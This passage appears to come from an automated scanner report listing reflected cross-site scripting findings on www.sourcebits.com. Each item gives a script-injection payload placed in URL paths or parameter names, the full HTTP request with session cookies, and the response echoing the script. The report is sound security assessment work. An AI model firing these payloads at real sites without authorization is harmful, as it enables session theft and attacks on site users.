The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de108"><script>alert(1)</script>3e8c044e162 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/sb_announce.jsde108"><script>alert(1)</script>3e8c044e162?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/sb_announce.jsde108"><script>alert(1)</script>3e8c044e162?1305558390" />
...[SNIP]...

1.118. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/sb_announce.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e342<script>alert(1)</script>3ffb94f2a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/sb_announce.js4e342<script>alert(1)</script>3ffb94f2a72?1305558390 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/sb_announce.js4e342<script>alert(1)</script>3ffb94f2a72?1305558390</h2>
...[SNIP]...

1.119. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67a4d<script>alert(1)</script>009e98f8d34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js67a4d<script>alert(1)</script>009e98f8d34/ttSelectbox-services.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js67a4d<script>alert(1)</script>009e98f8d34/ttSelectbox-services.js?1265536927</h2>
...[SNIP]...

1.120. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0e7"><script>alert(1)</script>2cbab05de96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js1d0e7"><script>alert(1)</script>2cbab05de96/ttSelectbox-services.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js1d0e7"><script>alert(1)</script>2cbab05de96/ttSelectbox-services.js?1265536927" />
...[SNIP]...

1.121. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a42c8<script>alert(1)</script>e7284ffa150 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ttSelectbox-services.jsa42c8<script>alert(1)</script>e7284ffa150?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/ttSelectbox-services.jsa42c8<script>alert(1)</script>e7284ffa150?1265536927</h2>
...[SNIP]...

1.122. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/js/ttSelectbox-services.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3abc5"><script>alert(1)</script>ef22e1f5765 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ttSelectbox-services.js3abc5"><script>alert(1)</script>ef22e1f5765?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/ttSelectbox-services.js3abc5"><script>alert(1)</script>ef22e1f5765?1265536927" />
...[SNIP]...

1.123. http://www.sourcebits.com/mac [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/mac

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a861c<script>alert(1)</script>bb9ac288c30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /maca861c<script>alert(1)</script>bb9ac288c30 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/maca861c<script>alert(1)</script>bb9ac288c30</h2>
...[SNIP]...

1.124. http://www.sourcebits.com/mac [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/mac

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f2c7<script>alert(1)</script>235db48bf8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac?7f2c7<script>alert(1)</script>235db48bf8d=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:26 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/mac?7f2c7<script>alert(1)</script>235db48bf8d=1</h2>
...[SNIP]...

1.125. http://www.sourcebits.com/mobile [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/mobile

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6eeec<script>alert(1)</script>5b92a5ac7f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile6eeec<script>alert(1)</script>5b92a5ac7f1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/mobile6eeec<script>alert(1)</script>5b92a5ac7f1</h2>
...[SNIP]...

1.126. http://www.sourcebits.com/mobile [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8e883<script>alert(1)</script>e396100ca93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile?8e883<script>alert(1)</script>e396100ca93=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/mobile?8e883<script>alert(1)</script>e396100ca93=1</h2>
...[SNIP]...

1.127. http://www.sourcebits.com/palmpre [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/palmpre

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c29b3<script>alert(1)</script>16978e18f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /palmprec29b3<script>alert(1)</script>16978e18f26 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/palmprec29b3<script>alert(1)</script>16978e18f26</h2>
...[SNIP]...

1.128. http://www.sourcebits.com/palmpre [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/palmpre

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d73be<script>alert(1)</script>d72abdbf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /palmpre?d73be<script>alert(1)</script>d72abdbf4a2=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/palmpre?d73be<script>alert(1)</script>d72abdbf4a2=1</h2>
...[SNIP]...

1.129. http://www.sourcebits.com/sourcebits.json [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/sourcebits.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d3ca<script>alert(1)</script>7aff0799826 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sourcebits.json7d3ca<script>alert(1)</script>7aff0799826?callback=twitterCallback2&count=10 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:50 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/sourcebits.json7d3ca<script>alert(1)</script>7aff0799826?callback=twitterCallback2&count=10</h2>
...[SNIP]...

1.130. http://www.sourcebits.com/web [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0d44<script>alert(1)</script>59746985c20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weba0d44<script>alert(1)</script>59746985c20 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/weba0d44<script>alert(1)</script>59746985c20</h2>
...[SNIP]...

1.131. http://www.sourcebits.com/web [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/web

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a74e0<script>alert(1)</script>1505dae608c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web?a74e0<script>alert(1)</script>1505dae608c=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
